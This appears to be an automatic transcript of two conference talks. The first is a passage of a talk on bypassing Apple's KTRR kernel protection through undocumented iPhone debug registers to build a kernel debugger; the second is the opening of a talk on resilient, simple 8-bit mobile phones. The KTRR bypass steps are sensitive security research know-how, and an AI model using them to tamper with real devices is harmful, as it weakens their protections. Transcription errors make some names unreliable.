a reset as it powers down and powers back up again. So we're going to have to do this KTRR hijack. We're going to need to modify the execution of the reset vector and skip the KTRR initialization every single time that a CPU core resets, unless we can find some way to disable the core from resetting. So I didn't know how to do either of these two things. So I just decided to play around with that original proprietary register that I found earlier. So the XNU source code documents a couple of the bits. I think it documents two of the bits in that register. The remaining bits are undocumented. So I figured, you know, might as well set some bits, clear some bits, see what happens, see if I learn anything interesting. And I kid you not, by sheer dumb luck, it happened that that register contained exactly the pieces of functionality we needed to pull this hijack together. So bit 30 actually will clear the halt and it'll allow the CPU to resume executing. And bit 26 will keep the CPU powered up so that it doesn't subsequently reset and then we have to re-hijack the reset vector. So basically the attack that we described before works perfectly well once we have this new functionality. We just make sure that once we hit this branch, we skip over the KTR register lockdown code and then these registers never get written to, KTRR is never initialized on the system, and kernel memory becomes executable. So what this looks like is first we have KTRR enabled. Once we do this hijack, KTRR is disabled on MMU and now any page in kernel memory could now potentially be executed. Got a little bit more to go. Thank you. So now that we've found a way to break KTRR, I want to talk about how to build an actual debugger on top of this because I found it to be a quite non-trivial challenge. So there were a number of steps involved in this process and actually in many of them I encountered issues that I thought would be basically insurmountable. So the first step in the process is we need to remap the kernel because even though we've enabled the ability to execute arbitrary kernel shellcode, we don't yet have the ability to patch kernel memory. Next we need to figure out some way to load a kernel extension. We need to make sure that we're properly handling interrupts because we're going to be disabling, or sorry, we're going to be halting CPUs and once a CPU is halted it of course can't service interrupts anymore. We're going to need to establish some sort of communication channel between the kernel extension running in your iPhone and your laptop running LLDB. And finally we need to implement a GDB stub to process the packet sent by LLDB and to drive the debugging hardware. So at the point at which we bypass KTRR, we have the ability to execute arbitrary kernel shellcode but we don't yet have the ability to patch kernel memory. The reason for this is that even though we've disabled KTRR on the MMUs, it's still fully enabled on the memory controller. So even though we can execute code outside of the read-only region, the read-only region's physical pages are still fully protected and we can't modify them persistently. So this is actually kind of problematic for us. We really do need to modify the page table permissions in order to make the kernel extensions memory executable. And the root of the page table hierarchy lies inside of the KTRR region, which is still protected. So the solution to this is to basically do exactly the same thing that Luca did in the 10.1.1 bypass, which is to remap the kernel onto fresh writable pages and set TTBR1 to point to the new page tables instead. So what that looks like is initially the TTBR1 registers is going to point to the root of the page tables, which lies inside the protected region. What we have to do is we need to copy the kernel, the pages containing the kernel, we need to copy the data of that onto new writable pages that are outside of the protected region, update the page tables in kernel memory, and then make TTBR1 point to the new modified page tables instead. And with that, we do now have the ability to patch the kernel. So the next step in this process is we need the ability to load kernel extensions. This actually turns out is pretty simple once we bypass KTRR. All we have to do is we need to allocate some memory to put the kernel extension in, copy in the binary, dynamically link the kernel extension against the kernel that's running, because if you want to have a kernel extension, presumably you're going to want to call kernel functions at various points. After that, we need to modify page tables to make the kernel extension executable, and finally we need to call some function in the kernel extension to begin it running. And with that, we're now ready to start designing a kernel debugger. So what I eventually settled on was a pretty simple design. I would have one core in the CPU, which I called the monitor core, is going to be exclusively reserved for the KTRRW debugger itself. So it's no longer going to be running XNU. All of the other cores in the system are going to continue to run your operating system as they do normally. When you set a breakpoint or a watchpoint on one of the debugged cores, it's going to cause that core to halt and enter debug state. So the monitor core is just going to sit in a tight loop, polling all of the other cores to see when they enter debug state. And when it notices this, it'll send a message to LLDB over some communication channel saying, hey, this core halted because it hit a breakpoint, and then LLDB can take care of the rest. Now, when I implemented this, I pretty quickly encountered weird panic messages. So this is one example, AOP panic, no pulse on something or other. And it took a little bit of effort, but what I eventually learned was this was being caused by a processor on the device called the Always On Processor, sending periodic interrupts to the main application processor. And the interrupts that are sent by the Always On Processor need to be handled or else the AOP will panic. And once the AOP panics, it brings down the whole system. Now, some of these interrupts are actually relatively easy to disable. I reverse engineered the watchdog timer kernel extension and found the hardware interface, the set of registers needed to disable that. But there were other interrupts which I wasn't able to narrow down. I wasn't able to disable. Now, I strongly suspect that the devfuse devices that some are able to acquire do have the ability to disable these interrupts, or in some way are not affected by this problem. Because presumably when Apple's engineers are using one of these devices to debug the kernel, and they halt the kernel for a few seconds, it's not a great user interface if when they resume execution, the whole kernel panics because of this interrupt problem. So I strongly suspect there's a way to fix this problem, but I wasn't able to find it. Instead, I basically implemented a big hack, which is that I started servicing interrupts from the AOP on the monitor core itself. Now, this introduced its own problem, which is that now execution on the monitor core can jump back into XNU and start running the IRQ handler at basically any time. And that includes when any of the debugged cores is halted holding an IRQ critical spin lock. This is a huge problem because once we try to acquire that same spin lock, we can't acquire it. It's already held. And the only way that lock can be released is if that debugged core is resumed, which it has to be done by us. So we entered this deadlock. For a very long time, I thought this was pretty much an unsolvable problem for my debugger, but it actually turns out there's a really, really simple solution. And the reason is that the XNU kernel itself has to deal with this problem. See, when an IRQ is delivered and some code is processing the IRQ, if interrupts were enabled, then a second IRQ could be delivered and cause the IRQ handler to be re-entered, in which case that same lock would be grabbed a second time. What that means is that interrupts have to be disabled while in an IRQ critical region, which means it's really easy to test for whether it's safe to halt one of the debugged cores. You just check whether interrupts are enabled or not. If interrupts are disabled, that means that it's possibly in an IRQ critical region, and you just wait a little bit of time before halting that core. And after that, all of my interrupt problems pretty much disappeared. So now we're at the point where we have a text running in the kernel. We seem to be able to halt and resume CPU cores, but we need some way for LLDB running on your laptop to communicate with the debugger running on your iPhone's kernel. I considered a number of different options, each with various advantages and disadvantages. Serial is really, really nice because it's incredibly simple to implement. USB I liked because it would be really, really fast. Wi-Fi, I kind of just threw in there in case the other two didn't work. There wasn't any really compelling reason to implement a debugger over Wi-Fi. What really made the decision was the disadvantages of each technique. So for Serial, as far as I'm aware, you do need special hardware in order to communicate with the iPhone over Serial. So this basically violates one of the goals of my homebrewed DevPhone, which is that you don't need any special hardware. Everything can be purchased from an Apple store. The other two techniques, USB and Wi-Fi, both suffered from the same problem, which is that I would need to write a custom driver for the hardware. The reason for this is that I cannot rely in my debugger on the code that I'm debugging. If I set a breakpoint and a CPU core halts while it has some lock used by the USB drivers, then when my application, or when my kernel debugger tries to communicate over that mechanism using the stack built into XNU, it's going to try to take the same lock and deadlock the same problem we had before. So whatever communication channel we use, we need to implement a custom driver for it, which is self-contained. So out of USB and Wi-Fi, I basically figured that writing a USB stack was slightly less painful. It was pretty easy to figure out with some Googling which hardware USB controller was used in the iPhone. It's a controller by Synopsys called the DesignWare High-Speed USB 2.0 on the Go controller. What's somewhat unfortunate about this controller is that it is proprietary. The interface that it uses to communicate is not one of the standard USB interfaces, which means that you cannot use kind of your stock open source off-the-shelf drivers for it. And when I tried to look at the data sheet to see how I could program my own driver, I quickly ran into a login wall. I couldn't actually access it, and I was unable to obtain the data sheet for it. So this seemed really problematic, but one thing that I could find was open source header files for this hardware. Now, there are open source drivers for operating it, but all the ones that I was able to find that operated this hardware did so in a host mode, so kind of as a laptop rather than as a device you plug into it. And that didn't really work for me, so that wouldn't be...that wasn't what I wanted, but I was able to use the header files which contained the register definitions. Now, the only place that I could think of that contained a fully self-contained implementation of the... of a USB stack that operated the exact same hardware as using the iPhone was the iPhone's very own Secure ROM. So the Secure ROM is the very first piece of code that runs on the application processor when it starts up. And it needs a USB stack in order to communicate with a computer over for DFU firmware upgrades. So I basically took Apple's Secure ROM, there are dumps of it that you can find online, and I put it into IDA and reverse engineered the Secure ROM's USB stack basically back to source, and then re-implemented it in C. And so this was a rather painful process, but the end result was that I was able to make my iPhone appear to my laptop as a special TTRW USB device. And with that, the only step left in actually implementing a debugger is implementing the GDB stub. This is pretty easy as compared to kind of the other stuff in this project. The GDB specification is open source, it's basically just a bunch of parsing and then driving the external debug interface. And once that was done, I had the ability to debug a production iPhone over USB, no special cables, no leak software involved. Yeah, it was pretty cool. So here I'll do a hopefully very quick demo of how to operate this debugger. So I have an iPhone, which you can see here. Right now you're able to see the kind of the screenshot of it on the laptop, but as soon as I operate the debugger, the USB stack will be taken over and you'll no longer be able to see this part of it. So what I'll do is I'll simply start the app that loads the kernel extension. And so once that's running, we'll lose connectivity with the device, but we can connect to it with LLDB. And yeah, okay, so LLDB has recognized this device as an iOS device, an iOS kernel cache. It's discovered the load address and it's halted the kernel. So we can now resume execution. Now I can't show this on the display, but for those of you in person, you can see that the device is still responsive. You can do things like load apps, and yet there's still a kernel debugger attached to the device. So we can do things, for example, I'll set a breakpoint on the syscall mincore. All right, so we have a breakpoint set. Now I have an application on the device that is simply going to call mincore with very distinctive arguments. It is possible to load an app onto the device over Wi-Fi even once the USB hardware has been co-opted. But for this demo, I'm just going to have the app pre-install the device. I'm going to click on the application icon and it basically immediately halts. The phone is no longer responsive because we're halted at a breakpoint. We can do things like get a back trace. We can examine registers. So look at the memory point to do by register X1 and we can indeed see our arguments that were passed from user space. We can do things like set watchpoints, kind of all of your standard debugging functionality. So we'll set a watchpoint on this memory address and resume execution and we basically immediately hit the watchpoint. And you can see the instruction that triggered this watchpoint loads X10 and X11. And these are indeed the values that we expect. So watchpoints seem to function correctly. We can disable the breakpoint and the watchpoint and resume execution. The app runs again. Your phone is responsive. So basically full featured kernel debugger. Cool. So thank you very much. The debugger source code is available on the Google Project Zero GitHub. I also wrote a blog post kind of describing in more detail the process of finding the KTR bypass. This was a really, really fun project and I'm really excited to hopefully make kernel debugging on the iPhone just a little bit easier. Future versions will probably be based on the boot ROM exploit which I'm really excited to see what comes out of that. So thank you. Thank you very much. So we have five minutes left for Q&A. Please queue up on the microphones in between. Microphone one, two, three, four. We have some more. And maybe you have questions from the signal angel. Signal angel. No questions from the signal angel. So microphone one, please. Yeah. Thanks for the amazing talk. At the beginning you showed us a tweet of the exploit and you said that everything you could do is possible with this one as well. And it said that it's not patchable. So do you see any problems regarding security or anything using such a technique? And is it possible to run it like without, I don't know, having the iPhone unlocked? And is there any way to sort of abuse this? Which could be wrong? Do you mean the boot ROM bug or do you mean the debugging registers used here or both or either? Yeah, just everything. All the above. I don't really know. This isn't really kind of my area of expertise. I can see some people might be able to leverage these types of vulnerabilities for proximal physical attacks. The debugging registers that I'm using here aren't really all that useful for a remote attack because you encounter that problem or a CPU resets and the KTR bypass gets lost. And really once you have kernel code execution, you should really consider your device fully compromised anyway. So I don't really think that the debug registers are a security issue. The boot ROM may be for physical stuff, but it depends on your threat model. Thank you. Microphone 4, please. Did you have a look into the Linux kernel for the Designware 2 core driver because it's in drivers USB, DVC 2, I think. Yeah, so this was actually really funny. Basically, as soon as I had finished implementing the USB stack and I'd got it working, I realized that the reason I couldn't find any open source drivers online was because I was searching for the wrong things in Google. I'm just really bad at Googling. And the files containing the driver for operating it in device mode were just named something different than I expected. So you learn as you go. Great. Thanks. Microphone 1, please. Hi. Great talk. I really enjoyed it. So I have a quick comment and then a question. So the comment is this is the first time this is publicly revealed, but the Vita was actually, the trust zone was first dumped exactly the same way through the core site registers. So that was 2014. I thought it was pretty funny seeing this still happening again and again. My question is you said you reversed the USB from SecureOn. So did you find Checkmate? So first about your comment, definitely I know that there are tons of people who have found similar capabilities. Basically, nothing that I've done in this project is original work. All of it is building off of stuff which other people have done. So absolutely that's definitely the case. About whether I discovered Checkmate or not, the first time I was looking at iBoot, I basically saw the USB stack code and was like, oh my God, this is so complicated. I want to avoid touching this if at all possible. So no, I completely missed that. Thank you. So no more questions. Please another big round of applause for Brandon. Thank you.
Development-fused iPhones with hardware debugging features like JTAG are out of reach for many security researchers. This talk takes you along my journey to create a similar capability using off-the-shelf iPhones. We'll look at a way to break KTRR, a custom hardware mitigation Apple developed to prevent kernel patches, and use this capability to load a kernel extension that enables full-featured, single-step kernel debugging with LLDB on production iPhones. This talk walks through the discovery of hardware debug registers on the iPhone X that enable low-level debugging of a CPU core at any time during its operation. By single-stepping execution of the reset vector, we can modify register state at key points to disable KTRR and remap the kernel as writable. I'll then describe how I used this capability to develop an iOS kext loader and a kernel extension called KTRW that can be used to debug the kernel with LLDB over USB.
10.5446/53159 (DOI)
Good evening. And welcome to day two of the congress. Our next speaker, Paul Gardner-Steven, is fighting for free, secure and resilient communications. He's known as the leader of the server project, building cell phone mesh networks, and also is the creator of the Mega65 computer that you can see right here. So he's going to tell us about his next project right now and also explore some issues that we face about building networks and keeping them secure and resilient. So please welcome Paul Gardner-Steven, creating resilient and sustainable mobile networks. Around the house. Okay. Thanks for coming along tonight. It's getting a little bit late in the night. Certainly for me it is past my normal bedtime. So apologies if I yawn. It's not that I'm bored or disengaged. It's just I flew in from Australia yesterday and still haven't really had enough sleep. But we should be fine. So cool. So what we can see here, we have the Mega65 prototype and we have a prototype of the megaphone and I'll talk about those two in a minute. So the entire presentation is actually going to be delivered with the technology that we're creating. So a bit of a dog food eating session for this kind of thing is a bit of a proof by example that we can actually do useful things with 8-bit systems. Because the whole pile of advantages when it comes to the security and digital sovereignty with that. So we can switch the screen to the screen. Super. Excellent. So we can have a look and make sure I've got the correct disk in there. Yes we do. We'll drop to C64 mode. And we'll load the... Oops, wrong one. Let's go. Fortunately we don't have to wait the long time. If I press and hold down the cap slot key the CPU runs at the full speed instead of normal speed. And so now it'll load up. It's Commodore 64 software right? So of course it has to be cracked. Even if I had to supply the original to the cracking crew because it's 2019. So we'll let that go because the graphics have changed a little bit as we go along and let the greets roll out there. So all of this has been created in FPGA. So we have complete sovereignty in that sense over the architecture so that we can really start trying to make systems that we have full control over from that full hardware layer and that are simple enough that we don't need to have a huge massive team of people to actually work on these things. A lot of what we're talking about here has been created in maybe three or four person years over the last few years. So it's quite possible to do a lot with these systems without needing to have the huge resources of a multinational company or something which is kind of key. So we'll do Mega 0, 36C3. OK, and I'll press F5 for presentation mode which really just hides the cursor. And then I can use my clicker. So we have moved, we'll switch the camera here for a moment. We switch the camera. Yep. So it's a genuine homemade Commodore 64 compatible joystick and it makes the most satisfying click noise when we use it. So if we can switch back to the slides, that will be great. Oh, yeah, super. Cool. So I am indeed going to be talking about creating resilient and sustainable mobile phones and hopefully that link when we already have the artifact there of the megaphone prototype and that will become a little bit clearer as we go through. So actually the last talk was kind of interesting talking about this whole, a different angle, this whole thing that communications has actually become really weaponized over the last decade or two in particular that we're seeing that where it used to be natural disasters that are the main problem, that now there is this whole problem of man-made disasters which is a major problem for us. And so we see internet shutdowns, communication shutdowns, we have surveillance happening in different places where it really oughtn't be happening. These state level actors that are very well resourced able to find zero-day exploits and the attack surface as we know in modern communications devices is simply huge. And so this is very asymmetric in the power equation between forces that seek to oppress people and the vulnerable people at the coal face who are just trying to get on with their lives and live good and decent lives and need communications to help protect themselves and enable that to happen. And that we're seeing that the value of communications is so well understood by these, you know, oppressing forces that it really has become quite a, you know, it's quite high up, there are a list of things to do. You know, you don't send the army in first to quiet and people down, you cut off their internet as the first thing. So this is part of the backdrop of what we see. And so what I would say is that the digital summer has actually finished. We're now in the digital autumn. We can see, like with farms and trees and things, there's still plenty of fruit to see in the early autumn, right? And there's lots on the ground. It feels like this time of plenty will continue. And we can all eat as we need, that there is enough more or less to go around. But the risk that we have is from this parable of the grasshopper and the ad. Who here knows the parable of the grasshopper and the ad? Hands right up, it's really hard for me to see up here. We'll swap and say who doesn't know. Okay, cool. I thought it was originally a German kind of proverb. This is the story of where the grasshopper is lounging around and enjoying the summer while the ants carry all the seeds back into the nest. And the ants tell the grasshopper, hey, you need to get some food and stuff and put away for the winter so that you can actually survive the winter. And the grasshopper is basically in denial about the fact that the season will change. And then of course the season changes, it snows and gets cold. And then the grasshopper goes knocking on the door of the ant hole. Not that they really have doors, but that's fine. It's like, oh, I'm starving and cold out here. And the ant is like, well, I told you so kind of thing. And I think actually in the end, it lets it in because we don't want to scare children too much with these stories. And so this is actually the challenge that we have. I love every time I come to these events, all the creativity that we see. We're enjoying the digital summer and all of the things that it's letting us create and the great open source software and tools and everything that's going on is absolutely fantastic. And we want that to be able to continue indefinitely. But we know that as we said, the chilling winds are beginning to come that tell us that unless we actually do something about it, that this isn't actually going to continue indefinitely. And just a statement that I really want to make here is this last dot point that I've got. The freedoms of the second half of the 20th century, post World War II, if you look at history, they are an aberration. To my knowledge, never before, and I fear perhaps never again, will we have that degree of personal liberty focus on individual freedom and agency and everything that was in this post-world era and is now starting to unwind. And starting to unwind back to the normal, totally asymmetric, well, to say sharing of power is the wrong word, it's the greedy collection of power and deprivation of the mass population from having anything resembling a fair share of what's going on. And so we have to act if we want for the digital summer to continue, or at worst, for the digital winter to be as short and shallow as we can have it. So that we can come back to a new digital summer. Because once we hit the digital winter, it will actually be too late. Because if we push this analogy, the digital winter is the time when there is no food on the tree. It isn't any longer possible, or at least practical, to create new technologies to enable us to feed our digital needs. And we can't plant any new crops, so to speak, until the digital spring comes again after that. And so the opportunity, like with the grasshopper, is now before the winter comes to say, right, what do we need to have in our store of technologies, our store of protocols, all of these different things so that when the digital winter comes, we don't starve. And fortunately, we can actually change the length of the digital winter. We can empower people so that the bitter cold of the digital winter is moderated, and that the spring can come as soon as it can. And the trouble that we have with this, we actually don't know when the digital winter will come exactly. We see these challenges around in the way that different governments and non-state actors as well, working in propaganda, and all of these things that are becoming, sadly, more intense and acute around us, we don't know when that tipping point will happen. But given the complexity of supply chains and things that are necessary in this, and I think Bunny was talking about that earlier today, that this is actually quite easy for it to actually quite quickly flip into the digital winter mode. And then, as with the real winter, at the very beginning of winter, there might still be enough to eat. But it gets harder and harder very rapidly, and if the winter gets too deep, then it's just not going to be possible to continue with these things. And so we've tried to think about what's needed to actually overcome this. What do we need focusing on mobile communications as a key piece of that? And there's a reason for that, in that it's a way that we can communicate, organize, you know, collectively protect communities against the threats that come in. If we look at things like the Great Hate of Earthquake just back in 2010, the breakdown of communications and law and order meant that there were quite horrible things going on within only about three days, actually, of the earthquake there. So there were militias that were basically robbing medical teams, trying to transport people between different hospitals, and there were much nastier things with, you know, gangs of people going around from village to village, basically doing whatever they want to whoever they want. It was really not cool. And so we want to avoid that kind of problem that comes when people are not able to collectively work together effectively as a community. And so the GPL for freedoms that we know from software, they're a great starting point. But I think actually we've seen enough things like with devolization and all of these sorts of other challenges that this is not sufficient when it comes to hardware. And there's actually some even more complicated things when you start talking about mobile phone kind of hardware as to how we can do that, which I'll talk about in a moment. But these are a starting point of what I've come up with as things that I see as being necessary. There's ample room for improvement. And in fact, with any of what we're trying to do in this space, we need folks to come along and help us. We can't do it alone. We need to work together so that we can help one another when the digital winter comes. So the first freedom is simply the freedom from energy infrastructure. We know critical infrastructure is disturbingly vulnerable, that the security of it is quite bad. But also you have these large centralized places that produce the energy that we need. And we see power cutoffs in Venezuela and all of these sorts of things regardless of who's actually doing it, whether it was sabotage or whether it was purposeful from the government. I don't know. It actually doesn't matter. The fact is it happens. But also, of course, in natural disaster, power goes out. Fortunately, this is actually one of the easiest things to solve. We just need to include some kind of alternative energy supply into the kind of devices that we're creating. So that could be solar panel on the back. Or you could have the Faraday, you shake it like a martini kind of thing to generate power or both, whatever you feel like. Or if you can find a good supply of ex-NASA radio isotope, then we'll generate this. That would also be fantastic. And we'll keep you warm through the winter as well. But if anyone has a supply of those, let me know. I'd love to hear. So then the second freedom is actually quite similar to the first. It's the realization that we need energy to communicate and communications to organize ourselves and be effective. And again, the communications infrastructure is in many ways actually even more fragile than the energy production infrastructure. It's much easier to guard a couple of power stations in a country than it is to guard every phone tower and all of the interconnecting links and all of these sorts of things between them. You know, communications deprivation is already being weaponized against the vulnerable around us. Again, fortunately, there's been a whole pile of work in this space. So the previous work I've done with the Servile Mesh and there's, you know, Fife-Hunk and, you know, a whole bunch of groups working on a whole bunch of different things in this kind of space for peer-to-peer secure authenticated communication. So yes, there's work to be done, but this is an area where there's actually already like the energy one. There's been quite a lot of work done that makes that quite feasible to work on. So then we start getting to some of the harder ones. We need to make sure that we are not dependent on, you know, the major vendors of our devices when it comes to the security of our devices. So this starts with simple things like that the GPL provides. So you know, full source code has to be available. But more than that, we actually have to make sure that we can actually exercise those rights in practice. So it needs to be simple enough that we can actually, you know, go right, okay, there's a security vulnerability in such and such, like, you know, Yusuke was talking about earlier today with some of the Bluetooth things, and then to actually be able to patch it yourself. It's quite obvious that this is not the case for whether it's firmware or whether it's the regular operating system on modern mobile phones. So who here has actually built Android from source themselves? Excellent, I expected to see a few folks here. Who's tried and gave up in disgust? Right, more hands. Yes, myself as well. Like, you know, I work on the server project and we do a whole pile of things and basically just, you know, after spending a number of hours on it, just went like, you know, this is actually, this is a lot of work for something that ought to be straightforward if we want to be able to make rapid progress. And so we want to have systems that are simple enough that we can patch, but in fact there's another really key advantage to simplicity that I'll probably come over a few times in this talk, and that is that simplicity reduces the attack surface. If we are in an asymmetric power environment where there are, whether they are state or non-state actors seeking to deprive vulnerable people of communications, they're going to have potentially the ability to put whole teams looking for vulnerabilities in software. In contrast, we might be lucky to have someone who's going to try and madly find when things are being exploited and to patch them. So we need to have ways around this kind of thing. And to my mind, reducing the attack surface is the only way that we can actually have any real hope of, you know, being able to keep up in that arms race of security. So freedom number four is related to this previous one. It's actually saying not only do we want to be able to patch it, we actually want to be able to change, enhance, do all of these things. And again, it comes back to the same basic need that the software is actually able to be compiled. And the hardware designs are simple enough that we can actually, you know, to work on these things so that we, again, not merely in theory have permission to innovate, but that it's in practice feasible to do so. And again, the simpler the system, the more probable it is that we can actually succeed in this kind of space. And then, you know, again, a lot of these are quite interrelated to this part of why I say it would actually be great to get feedback on how we might restructure these to make the boundaries really clear between these freedoms that we need. So we need the freedom to maintain the devices for the long run. So who here has or has had a fair phone, for example? I love the fair phone, by the way. Yep, a number of us. I've had one as well. And if you talk to the people at Fairphone, I think they have a team of a bunch of people just trying to maintain Android on the Fairphone 2, for example, and also now on the Fairphone 3 as it comes out. And this is actually really hard work. But again, the complexity and the barriers that are there make it really difficult to be able to just keep the thing running with the same hardware, let alone each time you want to target new hardware with new capabilities, this is just going to be, you know, as a community, we can probably do one or two devices if we kind of all collected our effort in, but to actually do it for devices that meet individual needs or appropriate for a particular area might have, as we say, a different energy source, someone might want to try putting some thermal electric thing or whatever, that at the moment, to do that with mobile phone hardware is just prohibitive in the complexity and the resourcing and effort that it would require. So we need to find solutions around this. And then again, related to that, overall, we have this problem of scale dependency. I think this is one of the really key things at the moment to make a mobile phone. You need to have a big enough market and you need to have a big enough enterprise and enough capital and all of the rest of it to actually be able to go through the very expensive process of, you know, designing the thing, getting injection molding tooling and all of that kind of thing made, that, you know, to do that for a modern phone, I suspect it's a few million euros to do it reasonably well. And if you did it on the cheap and skinny, it's probably still going to be something like a million euros to achieve. So we have to somehow break this down to make it feasible to do. And as I said earlier, simplicity is a key theme to my mind. But it's the only way I think that we can actually do it. So we've already talked about the challenges of just building an Android ROM, let alone modifying it to do new things in any kind of sophisticated way. And even if you do, the hardware is actually too complicated and there's a whole pile of trust issues around the complicated hardware. If you can't understand something by definition, it's a black box. And if it's a black box, by definition, you can't trust it because you don't know what's inside. So, you know, we have this point, again, in the digital winter, you don't want any black boxes or if you do, you want them very carefully monitored and managed. And so the system has to be not simple enough to make once. It needs to be simple enough that we can actually remake it again and again and again as we have need. It's a bit like the difference between a chainsaw and an axe, right? If you want to be in a remote area and have to be self-sufficient, much better to depend on axe to chop your wood because if you need to, you can make a new handle for your axe and, you know, with a bit more effort, you could do some very simple metallurgy and, you know, metal smelting with iron or if you happen to be lucky enough to have an area or copper or whatever. It's going to be a much easier proposition than having to do that and then somehow make fine machine tooling and making new chain parts and motor parts and all of this kind of thing. So it has to be, if it's going to be resilient and survivable, it has to be simple enough that you actually can build it with relatively simple tools going forward. Electronics is always going to be a bit challenged in this area because, you know, you need to do PCB fabrication, you need to get components and things, but we have to try and reduce the barriers as much as we can so that at least, for example, components scavenging, for example, might be an option. Or devices that will be available because they're still needed by other industries that have more protection as we head into a digital winter environment that we can take and repurpose that kind of hardware. So then this kind of leads into this tension then of saying, okay, if we make something which is simple enough, we know we as a community, we only have limited resources available to us to make this kind of resilient device, do we make one or do we all kind of like run off and make different kind of things? And I think this is a tension. I'm not going to claim that I know the absolute best setting for this. I think we need to have, as I say, kind of multiple germ lines so that if one system gets critically broken or proves to be ineffective and that there are others kind of in the wing that can kind of fill that niche in the environment, but we don't want to have so many that we actually don't get anywhere. And so this is a bit tricky. My gut feeling is making an initial device that can kind of demonstrate some of these kind of positive properties and then so other people will look at it and go like, well, that's really great. That's got us forward. But you know that was a really stupid design. I think this is a way better way to do it in the way that we have that freedom in the open source community to do is probably a pretty good way to do things. And I would say we're not yet at that end point of that proof of concept, but we're trying to move things forward to that and that point. So come actually to the megaphone that we're trying to create. And so in terms of what we've actually set out to do for the goals and kind of the methodology, we want something which is simple, secure, self-sufficient and survivable. A lot of the work that I do is, for example, with NGOs. We've worked with folks from Red Cross. We've worked with folks from the UN World Food Programme who, pardon me, interestingly are the distributors of communications in the UN cluster system for disasters because they kind of like hand out blankets and they hand out rice and things. Someone basically said to them, well, you should also be handing out the communications. And so that's just kind of how it's fell. And so, you know, and it needs to be able to do smart phony kind of things. Like we're great to have some navigation. It would be great to have in the disaster context the ability to fill in forms on the screen with a touch screen and the rest of it and have that uplink through. So for example, you think, you know, an Ebola outbreak in Africa, for example, to be able to collect, you know, that case information to track down the, you know, the case of heroes and all that kind of thing. You need communications that can work. Often these outbreaks happen in places where law and order and civil society is not really working because if it was, then they wouldn't have had the outbreak there. It would have been managed more effectively. And so you need this kind of, you know, dependable device that can work independent of everything else that's going on. And that might have to do software updates, for example, over a really expensive narrow band satellite link that might be, you know, tens of bytes per second or less. So that was kind of some of the, you know, the motivation around this to create it. And separately have been working on the Mega 65 project for a couple of years at that point. And it just kind of dawned on me that actually this kind of simple 8-bit architecture is powerful enough to actually be useful to do some things. And that's kind of, you know, why are we doing this, you know, the fun proof of, you know, proof by example, really of delivering the slides with this machine to show that you can do useful things if you write the code carefully and carefully written code is more likely to be verifiable and secure. And it's probably, I don't think you can get any simpler than an 8-bit system and still be useful. Like, I don't think we want to be trying to use an Intel 4004 derived 4-bit CPU to do things. By all means, if someone can find a way to do something with a system that's that simple and they can still do everything we need and it makes it even easier to verify, fantastic. My gut feeling is it would actually be worse on every point because the amount of work that you would have to do to do each useful thing, you end up with code which is actually larger in size. That I think my feeling is that the 8-bit architecture is about that sweet point. And so anyway, as a result of the Mega65 work, it's based directly on that. So the phone actually is a Mega65 in portable form and we'll show that in a little bit. And so we're getting towards that kind of proof of concept stage. We had the first phone calls back in Linux Conf. So if you kind of dig back through the video of that talk where with a much earlier prototype, we actually had people calling the machine, which is quite fun. And I'll talk a little bit later as well about some of the audio path kind of issues around that. So let's look at those six freedoms again now in what we're trying to do with the megaphone. So energy independence. The first step is we've got a filthy, great big battery. I hate it when phones go flat and when you're in a disaster zone or these kind of vulnerable situations you really don't want it going flat at the wrong time. So we've put a 32-watt hour lithium-ion phosphate battery that should have 2,000 full charge cycles in there. The device is about the size of a Nintendo Switch in terms of surface area. So putting high-performance solar cells like you would put on a solar racing car or on your roof, we can probably get about 7 watts with that. And you do the kind of math that's four or so hours of charge time. But we know in reality that the solar environment will often be much worse than that. It might be only 10%. It might only be 1% of that if you're talking about these kinds of latitudes under cloudy conditions. And so you really want to have the big battery and as big a solar panel as you can. And you want the power consumption to be as low as possible. So we've got CPLDs, which are kind of like little teeny tiny FPGAs that are managing the whole power environment and wake up the main FPGA only when something important needs to happen. So we believe with 32 watt hours we should be able to get about 1,000 hours standby with a 4G off-the-shelf cellular modem. And that's assuming that the solar panel was actually in a black box. Even the light here, if we had the 7 watt solar panel and had it sunny side up, we would be able to maintain charge indefinitely on the device because we only need to have about 8 milliwatts coming in. So we're talking about 1,000 of the capacity of the solar panel. So for communications, for independence, we really want as many possible ways to communicate as we can. And the naughty little things that we can't trust, in particular the cellular modem, we want to have a sandboxed and quarantined so that it can't spread its naughty plague of whatever vulnerabilities it has in there. Again, there are black box, we can't trust them, they're too hard for us to implement. And so this is kind of a decision that we've taken. We'd much rather have a fully open 4G modem. If someone makes one, fantastic, we'll incorporate it straight in because the system is designed to be easy to change. But in the meantime, we have to kind of do with what there is. The great thing is that these M.2 cellular modems are used in vending machines, in cars, in all sorts of things. So they're just the common as, again, if you had to scavenge them in the future, this would be quite feasible. And it also means we can upgrade. So we have two of these slots, so we could actually have a dual 5G Commodore 64. Because who wants to have to wait extra time when you're downloading your games, right? And 40 kilobytes can take a long time to download if you only got one 5G link, right? So we'll have two of them so we can do it in parallel. Because who wants to wait more than about four milliseconds to download new software? And again, limited communications availability in these kind of oppressive environments, this is actually key. You might only have short communications windows. So while it's a little bit tongue-in-cheek, it's not entirely. And of course, with several mesh, we've been doing UHF packet radio. So we've put in tri-band Lora compatible radios in there. Not Lora-wan. We're doing it fully decentralized. We're just sending out radio packets and listening in with the modules. We've also got ESP8266 Wi-Fi and some Bluetooth in there. So that's some other potential options. Acoustic networking, so we've got four microphones that are directly connected to our FPGA. So we can do crazy signal processing on that. And we've got a nice loud speaker that should work up into the ultrasonic range. So we could even have quite decent communications over 10 or so meters in the acoustic band. And there's a crazy bunch, and I've forgotten the name of the research group, that do air gap jumping. And they've done some quite crazy things with acoustics with, you know, if you leave your headphones plugged into your computer on your desk in a headphone jack, you can software reconfigure that and make that so it's a speaker and microphone. Because anyone that's interested in that, hold on a minute after and we can have a, and I can try and find the links for you. We've also got infrared LED. And so the idea with all of these kind of things and whatever else you can kind of do is that it should be really hard for an adversary to actually jam all of these things at the same time. You know, you might be able to do broadband RF jamming, but that's not going to stop the acoustics or the LED. And even if you can kind of make a lot of noise, it's going to be really hard to block, you know, the IR LED of people are kind of holding the devices near one another to do delay tolerant transfer. And of course, any other crazy things that people come up with, again, a simple system design that you can extend it easily yourself. Okay. Security independence. So the operating system runs in our little 8-bit CPU, which is basically a slightly enhanced version of the Commodore 64 CPU. It has an 8-bit hypervisor, which is 16 kilobytes in size, hardware limitation, because we don't want it getting bigger. If it gets 16K, then you have to throw some other things out and go, right, what does it actually really need to do so that you still have a system which is actually much more verifiable? And this kind of small software, it should be quite possible on this machine to run a simple C compiler, for example, to be able to compile the software that is actually running the core 